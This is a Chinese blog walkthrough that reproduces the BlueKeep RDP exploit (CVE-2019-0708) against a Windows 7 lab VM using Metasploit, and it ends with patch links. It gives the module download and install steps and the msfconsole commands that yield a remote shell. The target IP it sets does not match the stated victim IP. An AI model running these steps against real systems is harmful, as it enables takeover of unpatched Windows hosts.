windows_cve_2019_0708 exp复现

环境

kali 192.168.1.10
安装msf cve_2019_0708 exp,下载地址
链接:https://pan.baidu.com/s/1_A8AtsEalYt6q85cd5cdRw 密码:7zk6

下载exp,添加到kali自带到msf中,msf首先要升级到v5以上
升级命令 apt install metasploit-framework
网盘中共4个文件,分别放入msf目录中,msf目录根据自己安装到目录来,kali自带默认安装地址为/usr/share

rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/r
dp/rdp_scanner.rb  

cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/r
dp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_cve.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_
bluekeep_rce.rb

msfconsole --> reload_all

win7 192.168.1.13 被攻击机,开启远程桌面,关闭防火墙

利用

msf5 > search 0708
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 > set rhosts 192.168.1.11

因为win7用的是virtualbox,在target时要根据自己的虚拟环境进行选择
在这里插入图片描述

msf5 > set target 2
msf5 > run
shell
python 获取远程cmd

影响范围

Windows 7
Windows 2003
Windows Server 2008 R2
Windows Server 2008
Windows XP

修复方法

Microsoft官方已经在 2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

以及为已不受微软更新支持的系统(Windows Server 2003和Windows XP)提供的安全更新,下载地址:

https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

参考链接:https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值